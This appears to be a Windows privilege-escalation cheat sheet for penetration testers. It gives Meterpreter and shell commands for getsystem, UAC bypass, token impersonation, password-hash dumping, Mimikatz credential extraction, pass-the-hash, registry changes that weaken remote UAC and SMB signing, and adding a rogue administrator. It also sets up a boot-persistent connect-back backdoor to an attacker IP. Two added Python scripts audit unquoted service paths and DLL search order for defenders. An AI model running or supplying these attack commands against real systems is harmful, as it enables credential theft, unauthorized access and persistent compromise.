Privilege Escalation

Windows

With a Meterpreter Shell

getsystem
    Automatically try to escalate privileges to SYSTEM
run post/windows/gather/win_privs
    Enumerate the current user's privileges and basic system information
bypassuac
    Bypass UAC (it might work better to run this before getsystem)

Incognito (lateral Windows privesc)

Incognito is a Meterpreter extension for impersonating the access tokens of other logged-on users, which is how lateral privilege escalation on Windows is done here.

use incognito
    Load the Incognito extension
list_tokens -u
    List the user tokens available for impersonation
impersonate_token $USER
    Impersonate a user

Unquoted Service Paths

See the Unquoted Service Paths section below for how this vulnerability works.

use exploit/windows/local/trusted_service_path
    Automatically exploit unquoted service paths
show options
run

Dumping hashes

hashdump
    Dump the password hashes

If the command fails, migrate to another process, then rerun the command.

Pass the Hash

This only works with an account that has local administrator rights on the target.

use exploit/windows/smb/psexec
    Run psexec against the machine itself, authenticating with either a password or an NTLM hash (pass the hash)
show options
run

If the exploit fails with "Exploit failed [no-access]", run the following in PowerShell on the target:

Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system -Name RequireSecuritySignature -Value 0 -Type DWord

and rerun the exploit. LocalAccountTokenFilterPolicy=1 disables the UAC remote restrictions that normally filter local administrator tokens over the network; both values loosen the host's hardening, so note their previous values and restore them when done.

Mimikatz

Note that on 64-bit Windows Mimikatz only works without errors when the Meterpreter session lives inside a 64-bit process, so migrate first if needed.

ps -A x86_64 -s
    List 64-bit processes
migrate $PID
    Migrate to a process ID
load mimikatz
    Load the mimikatz extension
wdigest
    Try to extract credentials

Enable RDP

run getgui -e
    Enable RDP

If the user is not allowed to connect via RDP, run (in a Windows shell):

net localgroup "Remote Desktop Users" $USER /add
    Add a user to the Remote Desktop Users group
rdesktop $IP -u $USER -p $PASSWORD
    Connect to the machine via RDP

Connect-back Backdoors

This generates a connect-back backdoor (like a reverse shell, the target initiates the connection to our machine) that tries to reach our machine at every reboot.

persistence -A -X -i 5 -p 8080 -r $OUR_IP
    Start a connect-back backdoor: start a handler on our machine (-A), start the agent on boot (-X), retry every 5 s (-i 5), connect to our machine (-r) on port 8080 (-p)

To receive the callback later, simply start a handler on port 8080:

run exploit/multi/handler

Without a Meterpreter Shell

List started services

net start
    List the services that are currently started

Unquoted Service Paths

This vulnerability occurs when a service is configured with an unquoted binary path that contains spaces.

In that case Windows cannot tell where the executable name ends, so it tries each prefix of the path that ends before a space (with .exe appended) before the full path. For the service path C:\Program Files (x86)\Author\Program\SETEVENT.exe, it looks for the binary in this order:

  1. C:\Program.exe
  2. C:\Program Files (x86)\Author\Program.exe
  3. C:\Program Files (x86)\Author\Program\SETEVENT.exe

That way, we can write a reverse shell and name it C:\Program.exe or C:\Program Files (x86)\Author\Program.exe. This executable would be launched when the service starts, in place of the original executable.

wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
    List all auto-start services with unquoted paths outside the Windows directory
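As an added example (not code from the original cheat sheet), the Python script below performs the same audit as the wmic one-liner offline, on a constructed sample of wmic output, and additionally enumerates every file name Windows would try for each unquoted path, so an administrator can verify the permissions on those locations and fix the service by quoting its path. The column-splitting rule (two or more spaces between columns) and cutting the command line at the first ".exe" are assumptions of the script, not facts from the page.

```python
"""Audit Windows service command lines for the unquoted-path weakness.

Added example, not part of the original cheat sheet. It parses the text
that `wmic service get name,pathname,startmode` prints (a constructed
sample is embedded below; real wmic output is column-aligned, so columns
are split on runs of two or more spaces, an assumption of this parser)
and, for each unquoted service path containing a space, lists every file
name Windows tries before the real binary. Those locations are what an
admin checks for write access by ordinary users; the quoted ImagePath
that fixes the service is reported as well.
"""
import re

# Constructed sample of `wmic service get name,pathname,startmode` output.
SAMPLE_WMIC_OUTPUT = r"""
Name       PathName                                                    StartMode
Spooler    C:\Windows\System32\spoolsv.exe                             Auto
VulnSvc    C:\Program Files (x86)\Author\Program\SETEVENT.exe          Auto
SafeSvc    "C:\Program Files\Vendor\Agent Service\agent.exe" -svc      Auto
ManualSvc  C:\Tools\Some Tool\tool.exe -run                            Manual
""".strip("\n")


def parse_wmic_services(text):
    """Turn column-aligned wmic output into dicts with name, pathname, startmode."""
    services = []
    for line in text.splitlines()[1:]:  # the first line is the column header
        parts = re.split(r"\s{2,}", line.strip())
        if len(parts) < 3:
            continue
        services.append({"name": parts[0], "pathname": parts[1], "startmode": parts[2]})
    return services


def executable_part(cmdline):
    """Cut an unquoted command line at the first .exe (assumes .exe binaries)."""
    m = re.search(r"\.exe", cmdline, re.IGNORECASE)
    return cmdline[: m.end()] if m else cmdline


def search_candidates(exe_path):
    """File names CreateProcess tries, in order, for an unquoted path with
    spaces: each prefix ending at a space with .exe appended, then the full path."""
    candidates = [exe_path[:i] + ".exe" for i, ch in enumerate(exe_path) if ch == " "]
    candidates.append(exe_path)
    return candidates


def find_unquoted_service_paths(wmic_text, auto_only=True, skip_windows_dir=True):
    """Return one finding per vulnerable service: name, path, probe order, fix."""
    findings = []
    for svc in parse_wmic_services(wmic_text):
        cmdline = svc["pathname"]
        if auto_only and svc["startmode"].lower() != "auto":
            continue
        if cmdline.startswith('"'):
            continue  # quoted: the loader knows where the executable ends
        exe = executable_part(cmdline)
        if " " not in exe:
            continue  # no space, so there is only one way to parse the path
        if skip_windows_dir and exe.lower().startswith("c:\\windows\\"):
            continue  # same filter as the wmic one-liner: trust the Windows directory
        findings.append({
            "name": svc["name"],
            "path": exe,
            "candidates": search_candidates(exe),
            "fix": '"' + exe + '"' + cmdline[len(exe):],  # quoted ImagePath
        })
    return findings


if __name__ == "__main__":
    for f in find_unquoted_service_paths(SAMPLE_WMIC_OUTPUT, auto_only=False):
        print(f"{f['name']}: {f['path']}")
        for c in f["candidates"]:
            print("   tries", c)
        print("   fix  ", f["fix"])
```

Feed it the saved output of the wmic command instead of the sample to audit a real host; every candidate listed before the final full path is a location whose parent directory should not be writable by standard users.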

DLL search order

When a program is launched, the DLL search order (with SafeDllSearchMode enabled, which is the default) is generally:

  1. The directory of the executable
  2. C:\Windows\System32
  3. C:\windows\system
  4. C:\windows
  5. The current directory when the executable was launched
  6. All directories in the PATH environment variable
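An added example, not part of the original page: the search order above applied to a constructed executable and a constructed set of files, so that for each imported DLL one can see where the loader resolves it, which directories it probes first (the places whose write permissions a defender audits), and whether an application-local copy shadows the one in System32. The SafeDllSearchMode switch, the sample paths and the import list are assumptions of the script.

```python
"""Simulate the Windows DLL search order for an executable's imports.

Added example, not part of the original cheat sheet. The directory list
follows the default (SafeDllSearchMode enabled) order given in the text;
the file system is a constructed set of paths, so the script runs on any
OS. For every imported DLL it reports where the loader would find it, the
directories probed before that one (a writable directory there is where a
planted copy would win) and whether the resolved copy shadows System32.
"""
import ntpath

SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"
WINDIR = r"C:\Windows"

# Constructed sample: the executable, its imports and the files that exist.
EXE = r"C:\Apps\Tool\tool.exe"
IMPORTS = ["version.dll", "toolhelper.dll", "dbghelp.dll", "extra.dll"]
FILES = [
    r"C:\Windows\System32\version.dll",     # system copy only
    r"C:\Apps\Tool\toolhelper.dll",         # legitimate app-local DLL
    r"C:\Windows\System32\dbghelp.dll",
    r"C:\Apps\Tool\dbghelp.dll",            # app-local copy shadows the system one
    r"C:\Users\alice\bin\extra.dll",        # only reachable through PATH
]
CWD = r"C:\Users\alice"
PATH_DIRS = [r"C:\Users\alice\bin"]


def dll_search_order(exe_dir, cwd, path_dirs, safe_dll_search_mode=True):
    """Directories probed, in order. With SafeDllSearchMode off, the current
    directory moves up to second place (assumption stated in the lead-in)."""
    if safe_dll_search_mode:
        order = [exe_dir, SYSTEM32, SYSTEM16, WINDIR, cwd]
    else:
        order = [exe_dir, cwd, SYSTEM32, SYSTEM16, WINDIR]
    return order + list(path_dirs)


def resolve_dll(dll, order, existing_files):
    """Return (path found or None, directories probed before it). Paths are
    compared case-insensitively, as NTFS does."""
    known = {p.lower() for p in existing_files}
    probed = []
    for directory in order:
        candidate = ntpath.join(directory, dll)
        if candidate.lower() in known:
            return candidate, probed
        probed.append(directory)
    return None, probed


def audit_imports(exe_path, imports, existing_files, cwd, path_dirs):
    """Per-DLL report: resolved path, directories probed first, shadowing flag."""
    order = dll_search_order(ntpath.dirname(exe_path), cwd, path_dirs)
    known = {p.lower() for p in existing_files}
    report = {}
    for dll in imports:
        found, probed = resolve_dll(dll, order, existing_files)
        in_system32 = ntpath.join(SYSTEM32, dll).lower() in known
        report[dll] = {
            "resolved": found,
            "probed_before": probed,
            # a copy outside System32 wins over the system copy
            "shadows_system32": found is not None
            and ntpath.dirname(found).lower() != SYSTEM32.lower()
            and in_system32,
        }
    return report


if __name__ == "__main__":
    for dll, info in audit_imports(EXE, IMPORTS, FILES, CWD, PATH_DIRS).items():
        print(dll, "->", info["resolved"])
        print("   probed first:", info["probed_before"])
        print("   shadows System32:", info["shadows_system32"])
```

Two results worth noticing on the sample: version.dll is found in System32 only after the executable's directory was probed, and extra.dll is reached only in the sixth position via PATH, after five earlier directories; those earlier directories are where file permissions matter.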

Connect to RDP using an NTLM hash

xfreerdp /u:$USER /d:$DOMAIN /pth:$HASH /v:$IP
    Connect via RDP with the NTLM hash (requires Restricted Admin mode to be enabled on the target)

Create a new user

net user $USER $PASSWORD /add
    Create a new user
net localgroup "Administrators" $USER /add
    Add the user to the Administrators group

Linux